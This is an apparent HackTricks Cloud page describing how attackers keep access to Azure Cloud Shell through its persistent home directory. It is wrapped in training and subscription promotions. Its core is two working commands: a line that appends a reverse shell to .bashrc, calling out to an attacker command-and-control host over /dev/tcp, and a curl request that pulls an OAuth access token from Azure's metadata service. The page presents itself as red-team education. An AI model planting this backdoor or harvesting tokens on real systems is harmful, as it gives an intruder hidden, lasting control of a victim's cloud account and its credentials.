HackTricks CloudAz - Cloud Shell Persistence
Reading time: 2 minutes
{% hint style="success" %}
Learn & practice AWS Hacking: (1) (1) (1).png)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  (1).png)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Cloud Shell Persistence
Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:
- Persistent Storage: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
- Startup Scripts: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
Example backdoor in .bashrc:
{% code overflow="wrap" %}
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
{% endcode %}
This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.
Additionally query Azure’s metadata service for instance details and tokens: {% code overflow="wrap" %}
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
{% endcode %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.